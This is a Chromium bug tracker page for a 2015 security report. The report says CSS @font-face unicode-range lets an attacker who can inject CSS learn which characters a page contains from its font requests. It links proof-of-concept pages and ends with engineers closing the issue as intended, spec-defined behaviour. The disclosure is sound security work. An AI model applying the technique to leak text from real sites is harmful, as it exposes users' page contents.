New issue
Advanced search Search tips

Issue 543078 link

Starred by 2 users

Issue metadata

Status: WontFix
Owner:
Closed: Oct 2015
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security



Sign in to add a comment

@font-face unicode-range can be used as text reader

Reported by masatoki...@gmail.com, Oct 14 2015

Issue description

UserAgent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Steps to reproduce the problem:
[PoC 1]
1. Go to http://vulnerabledoma.in/poc_unicode-range.html .
2. See network tab of DevTools. You can see external requests including page text (M and K).

[PoC 2]
1. Go to http://vulnerabledoma.in/poc_unicode-range2.html .
2. See network tab of DevTools. You can see external requests including page text (M,a,s,t,o,K,i,n,u,g,w).

What is the expected behavior?

What went wrong?
Chrome fetches font only if the target node has characters in range of unicode-range descriptor.
I think this behavior exists for saving bandwidth. But on the one hand, an attacker can read page text using only CSS.

As you can see PoC 2, an attacker can't know duplicated characters. But in some cases like this PoC, it can give an attacker enough information.

Did this work before? N/A 

Chrome version: 45.0.2454.101  Channel: stable
OS Version: 6.2 (Windows 8)
Flash Version: Shockwave Flash 19.0 r0

This bug is public:
https://twitter.com/kinugawamasato/status/650632206155517952
 

Comment 1 by och...@chromium.org, Oct 14 2015

Labels: Cr-Blink-Fonts Security_Impact-Stable Security_Severity-Low
Owner: ksakamoto@chromium.org
This does seem like an unfortunate side effect if an attacker is able to inject arbitrary CSS into a page. But even if that's the case it's more a vulnerability on the website's side (XSS) as opposed to a Chrome vulnerability. I'm not sure if we can do much here as it appears to be intended behaviour.

Looping in ksakamoto@ who implemented this for thoughts.
Labels: -Cr-Blink-Fonts Cr-Blink-WebFonts
Status: WontFix
I agree with ochang@.

Note that this behavior is spec'd in CSS Fonts Module Level 3 (although at the moment only Blink implements it correctly). See EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/.

I'm pretty sure that the spec author gave some thought about this issue. You may want to discuss it on www-style W3C group.

Project Member

Comment 3 by ClusterFuzz, Jan 21 2016

Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.
Project Member

Comment 4 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 5 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment